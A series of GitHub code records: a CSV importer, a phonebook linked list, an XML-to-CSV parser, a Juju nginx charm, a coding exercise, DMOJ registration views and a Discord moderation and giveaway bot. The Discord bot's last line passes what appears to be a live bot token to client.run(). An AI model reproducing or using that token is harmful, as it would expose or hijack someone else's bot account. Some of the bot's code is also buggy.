ImportationCsv()\n >>> chemin = \"C:/Users/mathi/Documents/Ensai/2A/S1/Projet informatique\"\n >>> res = ma_liste.creer(\"listeformatCSV.csv\", chemin)\n >>> print(res)\n ['Apolinne', 'Mathis', 'Mathieu', 'Linh-da', 'Oussama']\n >>> ma_liste2 = ImportationCsv()\n >>> chemin = \"mauvais_chemin\"\n >>> res = ma_liste.creer(\"listeformatCSV.csv\", chemin)\n Le lien donné est invalide.\n \"\"\"\n liste_res = []\n\n try:\n with open(f'{dossier}/{fichier}','r', newline='', encoding= encodage) as csvfile:\n reader = csv.reader(csvfile, delimiter= separateur)\n for row in reader:\n liste_res.append(row[0])\n return liste_res\n except FileNotFoundError:\n print('Le lien donné est invalide.')\n return None\n\nif __name__==\"__main__\":\n import doctest\n doctest.testmod(verbose=True)\n","repo_name":"apollineguerineau/client_kata","sub_path":"importation_objects/importation_csv.py","file_name":"importation_csv.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17278283028","text":"class Item:\r\n def __init__(self, nome, telefone):\r\n self.dado = {'nome': nome, 'telefone': telefone}\r\n self.proximo = None\r\n self.anterior = None\r\n\r\nclass Lista:\r\n def __init__(self):\r\n self.cabeca = None\r\n self.calda = None\r\n self.tamanho = 0\r\n\r\n def is_empty(self):\r\n return self.cabeca is None\r\n\r\n def inserirInicio(self, nome, telefone):\r\n novo_item = Item(nome, telefone)\r\n if self.is_empty():\r\n self.cabeca = novo_item\r\n self.calda = novo_item\r\n else:\r\n novo_item.proximo = self.cabeca\r\n self.cabeca.anterior = novo_item\r\n self.cabeca = novo_item\r\n self.tamanho += 1\r\n\r\n def inserirFim(self, nome, telefone):\r\n novo_item = Item(nome, telefone)\r\n if self.is_empty():\r\n self.cabeca = novo_item\r\n self.calda = novo_item\r\n else:\r\n novo_item.anterior = self.calda\r\n self.calda.proximo = novo_item\r\n self.calda = novo_item\r\n self.tamanho += 1\r\n\r\n def remover(self):\r\n if self.is_empty():\r\n print('A lista está vazia')\r\n else:\r\n nome = input('Digite o nome da pessoa a ser removida: ')\r\n atual = self.cabeca\r\n while atual is not None:\r\n if atual.dado['nome'] == nome:\r\n if atual.anterior is not None:\r\n atual.anterior.proximo = atual.proximo\r\n else:\r\n self.cabeca = atual.proximo\r\n\r\n if atual.proximo is not None:\r\n atual.proximo.anterior = atual.anterior\r\n else:\r\n self.calda = atual.anterior\r\n\r\n self.tamanho -= 1\r\n print('Pessoa removida com sucesso.')\r\n return\r\n\r\n atual = atual.proximo\r\n\r\n print(f'O nome \"{nome}\" não foi encontrado na agenda')\r\n\r\n def buscar(self):\r\n if self.is_empty():\r\n print('A lista está vazia')\r\n else:\r\n nome = input('Digite o nome da pessoa a ser buscada: ')\r\n atual = self.cabeca\r\n while atual is not None:\r\n if atual.dado['nome'] == nome:\r\n print(f'Nome: {atual.dado[\"nome\"]}, Telefone: {atual.dado[\"telefone\"]}')\r\n return\r\n\r\n atual = atual.proximo\r\n\r\n print(f'O nome \"{nome}\" não foi encontrado na agenda')\r\n\r\n def mostrar(self):\r\n if self.is_empty():\r\n print('A lista está vazia')\r\n else:\r\n atual = self.cabeca\r\n while atual is not None:\r\n print(f'Nome: {atual.dado[\"nome\"]}, Telefone: {atual.dado[\"telefone\"]}')\r\n atual = atual.proximo\r\n\r\n\r\ndef menu(opcao):\r\n lista = Lista()\r\n\r\n if opcao == 1:\r\n for _ in range(3):\r\n nome = input('Nome: ')\r\n numTel = input('Número de Telefone: ')\r\n lista.inserirInicio(nome, numTel)\r\n print('Dados inseridos com sucesso!')\r\n\r\n elif opcao == 2:\r\n lista.remover()\r\n\r\n elif opcao == 3:\r\n lista.buscar()\r\n\r\n elif opcao == 4:\r\n lista.mostrar()\r\n\r\nwhile True:\r\n print('Escolha uma função digitando o número referente')\r\n\r\n print('1 - Inserir')\r\n print('2 - Remover')\r\n print('3 - Buscar')\r\n print('4 - Mostrar Agenda')\r\n print('5 - Sair')\r\n\r\n opcao = int(input('Digite um número referente a uma função: '))\r\n\r\n if opcao == 5:\r\n print('Você saiu!')\r\n break\r\n\r\n menu(opcao)\r\n","repo_name":"ferreirabatistamariaeduarda/N1---Lista-4---Fila-e-Lista","sub_path":"Questao 12.py","file_name":"Questao 12.py","file_ext":"py","file_size_in_byte":3655,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"44452558119","text":"import xml.etree.ElementTree as ET\nimport csv\nimport boto3\nimport logging\nfrom botocore.exceptions import ClientError\nfrom datetime import datetime\nfrom timeit import default_timer as timer\n\n\n# Creating Logger file\nlogger_file = \"./logs/\"+datetime.now().date().strftime(\"%Y_%m_%d\")+\".log\"\nlogging.basicConfig(filename=logger_file, filemode='w',\n format='%(name)s - %(levelname)s : %(message)s',\n level=logging.DEBUG)\nlogger = logging.getLogger('LargeXmlParser')\n\n\nXML_FILE = './xml_files/DLTINS_20210117_01of01.xml'\n# XML_FILE = './test_files/test_1.xml'\nCSV_EXPORT_FILENAME = './csv/xml_csv'\nAWS_STORAGE_BUCKET_NAME = \"st-data-lake\"\nFIELDS = [\n 'FinInstrmGnlAttrbts.Id',\n 'FinInstrmGnlAttrbts.FullNm',\n 'FinInstrmGnlAttrbts.ClssfctnTp',\n 'FinInstrmGnlAttrbts.CmmdtyDerivInd',\n 'FinInstrmGnlAttrbts.NtnlCcy',\n 'Issr'\n ]\n\n\nclass LargeXmlParser:\n\n \"\"\"\n LargeXmlParser parses xml file in parse_xml() and sends a\n list of dictionaries with parsed values\n to write_to_csv() for creating the final csv file.\n And final upload_file sends the csv file to a s3 bucket.\n \"\"\"\n\n def __init__(self, csv_filename, xml_file):\n \"\"\" Data Members initialisation \"\"\"\n logger.info(\"Intialising Data Members\")\n self.csv_filename = csv_filename\n self.xml_file = xml_file\n\n def parse_xml(self):\n \"\"\"\n Function to parse large xml iteratively\n looking at start and end events in the xml.\n\n :return: None\n \"\"\"\n # Generate csv header\n with open(self.csv_filename, 'a') as csvfile:\n # creating a csv dict writer object\n writer = csv.DictWriter(csvfile, fieldnames=FIELDS)\n # writing headers (field names)\n writer.writeheader()\n csvfile.close()\n\n logger.info('Starting XML Parsing...')\n try:\n # Get an iterable.\n context = ET.iterparse(self.xml_file, events=(\"start\", \"end\"))\n elements_parsed = 0\n row_count = 0\n\n for index, (event, elem) in enumerate(context):\n\n con_data = []\n row_dict = {}\n if index == 0:\n root = elem\n\n if event == \"end\" and \"TermntdRcrd\" in elem.tag:\n index = elem.tag.index('TermntdRcrd')\n attrib = elem.tag[:index]\n tag = elem.tag[index:]\n issr_elem = elem.find(attrib+\"Issr\")\n row_dict[\"Issr\"] = issr_elem.text\n for it in elem.iter(attrib+'FinInstrmGnlAttrbts'):\n fin_attr = it.find(attrib+\"Id\")\n row_dict[\"FinInstrmGnlAttrbts.Id\"] = fin_attr.text.encode('utf-8')\n logger.info('Record Id: {}'.format(fin_attr.text.encode('utf-8')))\n fin_attr = it.find(attrib+\"FullNm\")\n row_dict[\"FinInstrmGnlAttrbts.FullNm\"] = fin_attr.text.encode('utf-8')\n fin_attr = it.find(attrib+\"ClssfctnTp\")\n row_dict[\"FinInstrmGnlAttrbts.ClssfctnTp\"] = fin_attr.text.encode('utf-8')\n fin_attr = it.find(attrib+\"CmmdtyDerivInd\")\n row_dict[\"FinInstrmGnlAttrbts.CmmdtyDerivInd\"] = fin_attr.text.encode('utf-8')\n fin_attr = it.find(attrib+\"NtnlCcy\")\n row_dict[\"FinInstrmGnlAttrbts.NtnlCcy\"] = fin_attr.text.encode('utf-8')\n con_data.append(row_dict)\n sample_dict = row_dict\n root.clear()\n if len(row_dict) == 6:\n logger.info(\"Writing row into CSV..\")\n wrote_dict = self.write_to_csv(con_data)\n if wrote_dict is True:\n row_count = row_count + 1\n else:\n raise ValueError('Data dict is empty!')\n con_data = []\n elements_parsed = elements_parsed + 1\n except Exception as e:\n logger.error('Error occured during parsing XML due to : {}'.format(e))\n raise e\n return elements_parsed, row_count, sample_dict\n\n def write_to_csv(self, parsed_values):\n \"\"\"\n Function to parsed xml values into csv.\n\n :param parsed_values: list of dictionaries to write to csv file\n :return: None\n \"\"\"\n\n logger.info('Started writing into CSV file...')\n # writing to csv file\n try:\n if len(parsed_values) == 0:\n return False\n with open(self.csv_filename, 'a') as csvfile:\n\n # creating a csv dict writer object\n writer = csv.DictWriter(csvfile, fieldnames=FIELDS)\n\n # writing data rows\n writer.writerows(parsed_values)\n\n logger.info(\"Successfully inserted row into csv..\")\n csvfile.close()\n except Exception as e:\n logger.error('Could not write to csv file : {}'.format(e))\n raise e\n return True\n\n def upload_file_to_s3(self, csv_file_name, bucket, object_name=None):\n \"\"\"Upload a file to an S3 bucket\n\n :param file_name: File to upload\n :param bucket: Bucket to upload to\n :param object_name: S3 object name. If not specified then file_name is used\n :return: True if file was uploaded, else False\n \"\"\"\n s3 = boto3.resource('s3')\n if object_name is None:\n object_name = csv_file_name\n\n try:\n s3.meta.client.upload_file(csv_file_name, AWS_STORAGE_BUCKET_NAME, object_name)\n except ClientError as e:\n logging.error(e)\n return False\n return True\n\n\nif __name__ == '__main__':\n\n # Tracking start time\n start = timer()\n print(\"Start processing XML---->\")\n logger.info('###########################################################################################')\n logger.info(' Creating CSV Export file name')\n logger.info('###########################################################################################')\n csv_filename = CSV_EXPORT_FILENAME+\"_\"+datetime.now().date().strftime(\"%Y_%m_%d\")+\".csv\"\n logger.info('CSV Filename: \"{}\"'.format(csv_filename))\n logger.info('___________________________________________________________________________________________')\n\n logger.info('###########################################################################################')\n logger.info(' Parsing Large XML File')\n logger.info('###########################################################################################')\n parser = LargeXmlParser(csv_filename, XML_FILE)\n elements_parsed, row_count, row_dic_sample = parser.parse_xml()\n print('Elements Parsed: {}'.format(elements_parsed))\n print('Rows created in CSV : {}'.format(row_count))\n print('Sample Row Dict: {}'.format(row_dic_sample))\n logger.info('___________________________________________________________________________________________')\n\n end = timer()\n logger.info('################################## Process Summary #########################################################')\n logger.info(' Total Number of XML blocks parsed: {}'.format(elements_parsed))\n logger.info(' Total Number of Rows created in CSV : {}'.format(row_count))\n logger.info(' Sample parsed dict: {}'.format(row_dic_sample))\n logger.info(' Finished!! Time Taken: {}sec'.format(end - start))\n logger.info('############################################################################################################')\n print(\"Created CSV---->\")\n print('Finished!! Time Taken: {}sec'.format(end - start))\n\n logger.info('###########################################################################################')\n logger.info(' Sending CSV to AWS s3')\n logger.info('###########################################################################################')\n logger.info(' This functionaly is currently commented off')\n # parser.upload_file_to_s3(str(csv_filename), AWS_STORAGE_BUCKET_NAME)\n logger.info('___________________________________________________________________________________________')\n","repo_name":"ScreamSama/large_xml_parser","sub_path":"large_xml_parser.py","file_name":"large_xml_parser.py","file_ext":"py","file_size_in_byte":8440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73644363043","text":"import os\nimport socket\nimport subprocess\n\nfrom charms import layer\nfrom charms.reactive import when, when_any, when_not\nfrom charms.reactive import set_state, remove_state\nfrom charmhelpers.core import hookenv\nfrom charmhelpers.contrib.charmsupport import nrpe\n\nfrom charms.layer import nginx\n\nfrom subprocess import Popen\nfrom subprocess import PIPE\nfrom subprocess import STDOUT\n\n\n@when('certificates.available')\ndef request_server_certificates(tls):\n '''Send the data that is required to create a server certificate for\n this server.'''\n # Use the public ip of this unit as the Common Name for the certificate.\n common_name = hookenv.unit_public_ip()\n # Create SANs that the tls layer will add to the server cert.\n sans = [\n hookenv.unit_public_ip(),\n hookenv.unit_private_ip(),\n socket.gethostname(),\n ]\n # Create a path safe name by removing path characters from the unit name.\n certificate_name = hookenv.local_unit().replace('/', '_')\n # Request a server cert with this information.\n tls.request_server_cert(common_name, sans, certificate_name)\n\n\n@when('nginx.available', 'apiserver.available',\n 'certificates.server.cert.available')\ndef install_load_balancer(apiserver, tls):\n ''' Create the default vhost template for load balancing '''\n # Get the tls paths from the layer data.\n layer_options = layer.options('tls-client')\n server_cert_path = layer_options.get('server_certificate_path')\n cert_exists = server_cert_path and os.path.isfile(server_cert_path)\n server_key_path = layer_options.get('server_key_path')\n key_exists = server_key_path and os.path.isfile(server_key_path)\n # Do both the the key and certificate exist?\n if cert_exists and key_exists:\n # At this point the cert and key exist, and they are owned by root.\n chown = ['chown', 'www-data:www-data', server_cert_path]\n # Change the owner to www-data so the nginx process can read the cert.\n subprocess.call(chown)\n chown = ['chown', 'www-data:www-data', server_key_path]\n # Change the owner to www-data so the nginx process can read the key.\n subprocess.call(chown)\n\n hookenv.open_port(hookenv.config('port'))\n services = apiserver.services()\n nginx.configure_site(\n 'apilb',\n 'apilb.conf',\n server_name='_',\n services=services,\n port=hookenv.config('port'),\n server_certificate=server_cert_path,\n server_key=server_key_path,\n )\n hookenv.status_set('active', 'Loadbalancer ready.')\n\n\n@when('nginx.available')\ndef set_nginx_version():\n ''' Surface the currently deployed version of nginx to Juju '''\n cmd = 'nginx -v'\n p = Popen(cmd, shell=True,\n stdin=PIPE,\n stdout=PIPE,\n stderr=STDOUT,\n close_fds=True)\n raw = p.stdout.read()\n # The version comes back as:\n # nginx version: nginx/1.10.0 (Ubuntu)\n version = raw.split(b'/')[-1].split(b' ')[0]\n hookenv.application_version_set(version.rstrip())\n\n\n@when('website.available')\ndef provide_application_details(website):\n ''' re-use the nginx layer website relation to relay the hostname/port\n to any consuming kubernetes-workers, or other units that require the\n kubernetes API '''\n website.configure(port=hookenv.config('port'))\n\n\n@when('loadbalancer.available')\ndef provide_loadbalancing(loadbalancer):\n '''Send the public address and port to the public-address interface, so\n the subordinates can get the public address of this loadbalancer.'''\n loadbalancer.set_address_port(hookenv.unit_get('public-address'),\n hookenv.config('port'))\n\n\n@when('nrpe-external-master.available')\n@when_not('nrpe-external-master.initial-config')\ndef initial_nrpe_config(nagios=None):\n set_state('nrpe-external-master.initial-config')\n update_nrpe_config(nagios)\n\n\n@when('nginx.available')\n@when('nrpe-external-master.available')\n@when_any('config.changed.nagios_context',\n 'config.changed.nagios_servicegroups')\ndef update_nrpe_config(unused=None):\n services = ('nginx',)\n\n hostname = nrpe.get_nagios_hostname()\n current_unit = nrpe.get_nagios_unit_name()\n nrpe_setup = nrpe.NRPE(hostname=hostname)\n nrpe.add_init_service_checks(nrpe_setup, services, current_unit)\n nrpe_setup.write()\n\n\n@when_not('nrpe-external-master.available')\n@when('nrpe-external-master.initial-config')\ndef remove_nrpe_config(nagios=None):\n remove_state('nrpe-external-master.initial-config')\n\n # List of systemd services for which the checks will be removed\n services = ('nginx',)\n\n # The current nrpe-external-master interface doesn't handle a lot of logic,\n # use the charm-helpers code for now.\n hostname = nrpe.get_nagios_hostname()\n nrpe_setup = nrpe.NRPE(hostname=hostname)\n\n for service in services:\n nrpe_setup.remove_check(shortname=service)\n","repo_name":"kedgeproject/kedge","sub_path":"vendor/github.com/openshift/origin/cmd/cluster-capacity/go/src/github.com/kubernetes-incubator/cluster-capacity/vendor/k8s.io/kubernetes/cluster/juju/layers/kubeapi-load-balancer/reactive/load_balancer.py","file_name":"load_balancer.py","file_ext":"py","file_size_in_byte":5002,"program_lang":"python","lang":"en","doc_type":"code","stars":298,"dataset":"github-code","pt":"54"} +{"seq_id":"73638654563","text":"#time 20\nclass Solution:\n def findMaxAverage(self, nums: list[int], k: int) -> float:\n windowEnd = k - 1\n windowStart = 0\n maxAverage = -(10**4)\n windowSum = sum(nums[windowStart:windowEnd])\n while windowEnd < len(nums):\n windowSum += nums[windowEnd]\n avg = windowSum/(windowEnd - windowStart + 1)\n maxAverage = max(avg, maxAverage)\n windowSum -= nums[windowStart]\n windowEnd += 1\n windowStart += 1\n \n return maxAverage","repo_name":"Haymanot-Demis/A2SV-Problems","sub_path":"Sliding Window/Minimum Subarray Average I.py","file_name":"Minimum Subarray Average I.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71586552801","text":"# coding=utf-8\nimport re\n\nfrom django import forms\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.password_validation import get_default_password_validators\nfrom django.forms import ChoiceField, ModelChoiceField\nfrom django.shortcuts import render\nfrom django.utils.translation import gettext, gettext_lazy as _, ngettext\nfrom registration.backends.default.views import (ActivationView as OldActivationView,\n RegistrationView as OldRegistrationView)\nfrom registration.forms import RegistrationForm\nfrom sortedm2m.forms import SortedMultipleChoiceField\n\nfrom judge.models import Language, Organization, Profile, TIMEZONE\nfrom judge.utils.recaptcha import ReCaptchaField, ReCaptchaWidget\nfrom judge.utils.subscription import Subscription, newsletter_id\nfrom judge.widgets import Select2MultipleWidget, Select2Widget\n\nbad_mail_regex = list(map(re.compile, settings.BAD_MAIL_PROVIDER_REGEX))\n\n\nclass CustomRegistrationForm(RegistrationForm):\n username = forms.RegexField(regex=r'^\\w+$', max_length=30, label=_('Username'),\n error_messages={'invalid': _('A username must contain letters, '\n 'numbers, or underscores.')})\n timezone = ChoiceField(label=_('Timezone'), choices=TIMEZONE,\n widget=Select2Widget(attrs={'style': 'width:100%'}))\n language = ModelChoiceField(queryset=Language.objects.all(), label=_('Preferred language'), empty_label=None,\n widget=Select2Widget(attrs={'style': 'width:100%'}))\n organizations = SortedMultipleChoiceField(queryset=Organization.objects.filter(is_open=True),\n label=_('Organizations'), required=False,\n widget=Select2MultipleWidget(attrs={'style': 'width:100%'}))\n\n if newsletter_id is not None:\n newsletter = forms.BooleanField(label=_('Subscribe to newsletter?'), initial=True, required=False)\n\n if ReCaptchaField is not None:\n captcha = ReCaptchaField(widget=ReCaptchaWidget())\n\n def clean_email(self):\n if User.objects.filter(email=self.cleaned_data['email']).exists():\n raise forms.ValidationError(gettext('The email address \"%s\" is already taken. Only one registration '\n 'is allowed per address.') % self.cleaned_data['email'])\n if '@' in self.cleaned_data['email']:\n domain = self.cleaned_data['email'].split('@')[-1].lower()\n if (domain in settings.BAD_MAIL_PROVIDERS or\n any(regex.match(domain) for regex in bad_mail_regex)):\n raise forms.ValidationError(gettext('Your email provider is not allowed due to history of abuse. '\n 'Please use a reputable email provider.'))\n return self.cleaned_data['email']\n\n def clean_organizations(self):\n organizations = self.cleaned_data.get('organizations') or []\n max_orgs = settings.DMOJ_USER_MAX_ORGANIZATION_COUNT\n if len(organizations) > max_orgs:\n raise forms.ValidationError(ngettext('You may not be part of more than {count} public organization.',\n 'You may not be part of more than {count} public organizations.',\n max_orgs).format(count=max_orgs))\n return self.cleaned_data['organizations']\n\n\nclass RegistrationView(OldRegistrationView):\n title = _('Register')\n form_class = CustomRegistrationForm\n template_name = 'registration/registration_form.html'\n\n def get_context_data(self, **kwargs):\n if 'title' not in kwargs:\n kwargs['title'] = self.title\n kwargs['TIMEZONE_MAP'] = settings.TIMEZONE_MAP\n kwargs['password_validators'] = get_default_password_validators()\n kwargs['tos_url'] = settings.TERMS_OF_SERVICE_URL\n return super(RegistrationView, self).get_context_data(**kwargs)\n\n def register(self, form):\n user = super(RegistrationView, self).register(form)\n profile, _ = Profile.objects.get_or_create(user=user, defaults={\n 'language': Language.get_default_language(),\n })\n\n cleaned_data = form.cleaned_data\n profile.timezone = cleaned_data['timezone']\n profile.language = cleaned_data['language']\n profile.organizations.add(*cleaned_data['organizations'])\n profile.save()\n\n if newsletter_id is not None and cleaned_data['newsletter']:\n Subscription(user=user, newsletter_id=newsletter_id, subscribed=True).save()\n return user\n\n def get_initial(self, *args, **kwargs):\n initial = super(RegistrationView, self).get_initial(*args, **kwargs)\n initial['timezone'] = settings.DEFAULT_USER_TIME_ZONE\n initial['language'] = Language.objects.get(key=settings.DEFAULT_USER_LANGUAGE)\n return initial\n\n\nclass ActivationView(OldActivationView):\n title = _('Activation Key Invalid')\n template_name = 'registration/activate.html'\n\n def get_context_data(self, **kwargs):\n if 'title' not in kwargs:\n kwargs['title'] = self.title\n return super(ActivationView, self).get_context_data(**kwargs)\n\n\ndef social_auth_error(request):\n return render(request, 'generic-message.html', {\n 'title': gettext('Authentication failure'),\n 'message': request.GET.get('message'),\n })\n","repo_name":"DMOJ/online-judge","sub_path":"judge/views/register.py","file_name":"register.py","file_ext":"py","file_size_in_byte":5582,"program_lang":"python","lang":"en","doc_type":"code","stars":782,"dataset":"github-code","pt":"54"} +{"seq_id":"15064832671","text":"import discord\r\nfrom discord.ext import commands\r\nimport random\r\nimport asyncio\r\n\r\nimport datetime\r\nclient = commands.Bot(command_prefix=\"+\")\r\n\r\n\r\n\r\n# Mute command\r\n@client.command()\r\n@commands.has_permissions(administrator=True)\r\nasync def mute(ctx, member : discord.Member, *, reason='No reason provided'):\r\n print(\"a\")\r\n role = discord.utils.get(ctx.guild.roles, name=\"Muted\")\r\n if member == ctx.author:\r\n await ctx.send(\"You can't mute yourself!\")\r\n\r\n \r\n elif role not in ctx.guild.roles:\r\n await ctx.send(\"create muted role please\")\r\n\r\n \r\n \r\n else:\r\n print(\"a\")\r\n await member.add_roles(role)\r\n embed = discord.Embed(title=\"Muted.\", description=f\"**{ctx.author}** has muted **{member}** \\nReason: `{reason}`\", color = discord.Colour.red())\r\n await ctx.send(embed=embed)\r\n\r\n# Mute error handling\r\n@mute.error\r\nasync def mute_error(ctx, error):\r\n if isinstance(error, commands.BadArgument):\r\n embed = discord.Embed(title=f\"Failed.\", description=f\"Member could not be found.\", colour = discord.Colour.red())\r\n await ctx.send(embed=embed)\r\n\r\n# Kick command\r\n@client.command()\r\n@commands.has_permissions(administrator=True)\r\nasync def kick(ctx, member: discord.Member, *, reason = None):\r\n \r\n # Message sent when reason is not given\r\n if reason == None:\r\n reason = \"No reason provided.\"\r\n\r\n # If message is directed to self\r\n if member == ctx.author:\r\n await ctx.send(\"You can't kick yourself!\")\r\n\r\n # If user checks pass\r\n else:\r\n await member.kick(reason=reason)\r\n embed = discord.Embed(title=\"Kicked.\", description=f\"**{ctx.author}** has kicked **{member}** \\nReason: `{reason}`\", colour = discord.Colour.red())\r\n await ctx.send(embed=embed)\r\n\r\n# Kick error handling\r\n@kick.error\r\nasync def kick_error(ctx, error):\r\n if isinstance(error, commands.BadArgument):\r\n embed = discord.Embed(title=f\"Failed.\", description=f\"Member could not be found.\", colour = discord.Colour.red())\r\n await ctx.send(embed=embed)\r\n\r\n# Ban command\r\n@client.command()\r\n@commands.has_permissions(administrator=True)\r\nasync def ban(ctx, member: discord.Member, *, reason = None):\r\n if reason == None:\r\n reason = \"No reason provided.\"\r\n if member == ctx.author:\r\n await ctx.send(\"You can't ban yourself!\")\r\n\r\n else:\r\n await member.ban(reason=reason)\r\n embed = discord.Embed(title=\"Banned.\", description=f\"**{ctx.author}** has banned **{member}** \\nReason: `{reason}`\", colour = discord.Colour.red())\r\n await ctx.send(embed=embed)\r\n\r\n# Ban error handling\r\n@ban.error\r\nasync def ban_error(ctx, error):\r\n if isinstance(error, commands.BadArgument):\r\n embed = discord.Embed(title=f\"Failed.\", description=f\"Member could not be found.\", colour = discord.Colour.red())\r\n await ctx.send(embed=embed)\r\n\r\n# Unban command\r\n@client.command()\r\n@commands.has_permissions(administrator=True)\r\nasync def unban(ctx, member : int):\r\n mem = await client.fetch_user(member)\r\n await ctx.guild.unban(discord.Object(id=member))\r\n embed = discord.Embed(title=\"Unbanned.\", description=f\"Succesfully unbanned **{mem}**.\", color = discord.Colour.green())\r\n await ctx.send(embed=embed)\r\n\r\n# Unban error handling\r\n@unban.error\r\nasync def unban_error(ctx, error):\r\n if isinstance(error, commands.BadArgument):\r\n embed = discord.Embed(title=f\"Failed.\", description=f\"Your id contained letters.\", colour = discord.Colour.red())\r\n await ctx.send(embed=embed)\r\n\r\n\r\n # Unmute command\r\n@client.command()\r\n@commands.has_permissions(administrator=True)\r\nasync def unmute(ctx, member : discord.Member):\r\n role = discord.utils.get(ctx.guild.roles, name=\"Muted\")\r\n if ctx.author == member:\r\n await ctx.send(\"You can't unmute yourself.\")\r\n elif role not in member.roles:\r\n await ctx.send(\"That member wasn't muted in the first place.\")\r\n else:\r\n await member.remove_roles(role)\r\n embed = discord.Embed(title=f\"Unmuted.\", description=f\"**{member}** was succesfully unmuted.\", colour = discord.Colour.green())\r\n await ctx.send(embed=embed)\r\n\r\n# Unmute error handling\r\n@unmute.error\r\nasync def unmute_error(ctx, error):\r\n if isinstance(error, commands.BadArgument):\r\n embed = discord.Embed(title=f\"Failed.\", description=f\"Member could not be found.\", colour = discord.Colour.red())\r\n await ctx.send(embed=embed)\r\n\r\ndef convert(time):\r\n\tpos = [\"s\", \"m\", \"h\", \"d\"]\r\n\r\n\ttime_dict = {\"s\": 1, \"m\": 60, \"h\": 3600, \"d\": 3600*24}\r\n\r\n\tunit = time[-1]\r\n\r\n\tif unit not in pos:\r\n\t\treturn[-1]\r\n\ttry:\r\n\t\tval = int(time[:-1])\r\n\texcept:\r\n\t\treturn -2\r\n\r\n\treturn val * time_dict[unit]\r\n\r\n@client.command()\r\n@commands.has_permissions(administrator=True)\r\nasync def giveaway(ctx):\r\n\t# Giveaway command requires the user to have permissions to function properly\r\n\r\n\t# Stores the questions that the bot will ask the user to answer in the channel that the command was made\r\n\t# Stores the answers for those questions in a different list\r\n\tgiveaway_questions = ['Which channel will I host the giveaway in?', 'What is the prize?',\r\n\t\t\t\t\t\t 'How long should the giveaway run for (s|m|h|d)?', ]\r\n\tgiveaway_answers = []\r\n\r\n\t# Checking to be sure the author is the one who answered and in which channel\r\n\tdef check(m):\r\n\t\treturn m.author == ctx.author and m.channel == ctx.channel\r\n\r\n\t# Askes the questions from the giveaway_questions list 1 by 1\r\n\t# Times out if the host doesn't answer within 30 seconds\r\n\tfor question in giveaway_questions:\r\n\t\tawait ctx.send(question)\r\n\t\ttry:\r\n\t\t\tmessage = await client.wait_for('message', timeout=30.0, check=check)\r\n\t\texcept asyncio.TimeoutError:\r\n\t\t\tawait ctx.send(\r\n\t\t\t\t'You didn\\'t answer in time. Please try again and be sure to send your answer within 30 seconds of the question.')\r\n\t\t\treturn\r\n\t\telse:\r\n\t\t\tgiveaway_answers.append(message.content)\r\n\r\n\t# Grabbing the channel id from the giveaway_questions list and formatting is properly\r\n\t# Displays an exception message if the host fails to mention the channel correctly\r\n\ttry:\r\n\t\tc_id = int(giveaway_answers[0][2:-1])\r\n\texcept:\r\n\t\tawait ctx.send(f'You failed to mention the channel correctly. Please do it like this: {ctx.channel.mention}')\r\n\t\treturn\r\n\r\n\t# Storing the variables needed to run the rest of the commands\r\n\tchannel = client.get_channel(c_id)\r\n\tprize = str(giveaway_answers[1])\r\n\ttime = convert(giveaway_answers[2])\r\n\tif time == -1:\r\n\t\tawait ctx.send(f\"You didn't answer the time with a proper unit. Use (s|m|h|d)\")\r\n\t\treturn\r\n\telif time == -2: \r\n\t\tawait ctx.send(f\"The time must be an integer. Please enter an integer\")\r\n\t\treturn\r\n\r\n\t# Sends a message to let the host know that the giveaway was started properly\r\n\tasync def message(ctx, user:discord.Member, *, message=None):\r\n\t\tawait ctx.send(\r\n\t\tf'The giveaway for {prize} will begin shortly.\\nPlease direct your attention to {channel.mention}, this giveaway will end in {giveaway_answers[2]}')\r\n\r\n\t# Giveaway embed message\r\n\tgive = discord.Embed(color=discord.Color.orange())\r\n\tgive.set_author(name=f'Giveaway!', icon_url='https://i.imgur.com/VaX0pfM.png')\r\n\tgive.add_field(name=f'Prize: {prize}!',\r\n\t\t\t\t value=f'React with 🎉 to enter!\\n Ends in {round(time / 60, 2)} minutes!', inline=False)\r\n\tend = datetime.datetime.utcnow() + datetime.timedelta(seconds=time)\r\n\tgive.set_footer(text=f'Giveaway ends at {end} UTC!')\r\n\tmy_message = await channel.send(embed=give)\r\n\r\n\t# Reacts to the message\r\n\tawait my_message.add_reaction(\"🎉\")\r\n\tawait asyncio.sleep(time)\r\n\r\n\tnew_message = await channel.fetch_message(my_message.id)\r\n\r\n\t# Picks a winner\r\n\tusers = [user for reactions in new_message.reactions\r\n async for user in reactions.users()\r\n\t\tif user != client.user]\r\n\twinner = random.choice(users)\r\n\tprint(users)\r\n\t\r\n\r\n\t# Announces the winner\r\n\twinning_announcement = discord.Embed(color=discord.Color.orange())\r\n\twinning_announcement.set_author(name=f'The Giveaway has ended!', icon_url='https://i.imgur.com/DDric14.png')\r\n\twinning_announcement.add_field(name=f'🎉 Prize: {prize}',\r\n\t\t\t\t\t\t\t\t value=f'🥳 **Winner**: {winner.mention}\\n 🎫 **Number of Entrants**: {len(users)}',\r\n\t\t\t\t\t\t\t\t inline=False)\r\n\twinning_announcement.set_footer(text='Thanks for entering!')\r\n\tawait channel.send(embed=winning_announcement)\r\n\r\n\r\nclient.run(\"MTAzNDc3MDIxOTk0OTg5MTYzNA.GX-iAX.P0VLDYPT0UzHy9u-Qg1ugl-Bb_Khu6uyAPaA1A\")","repo_name":"rishi09saroj/mybotpy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35978953081","text":"import numpy as np\nfrom numpy import pi\nfrom utilities import find_magnetization\n\ndef hysteresis_loop(h_min, h_max, num_h_points, energy_func, derivative, second_derivative, min_x=-pi, max_x=pi, x_steps=50, args=()):\n \"\"\"Calculate the hysteresis loop for the Stoner Wohlfarth model\n\n Params:\n h_min (float): Minimum field\n h_max (float): Maximum field\n num_h_points (int): Number of field points\n energy_func (function):\n derivative (function):\n second_derivative (function):\n min_x (float): Minimum value in which to search for roots\n max_x (float): Maximum value in which to search for roots\n x_steps (int): Number of trials to do between [min_x, max_x] for finding roots\n args (tuple): Extra arguments that will be passed to the energy function and its 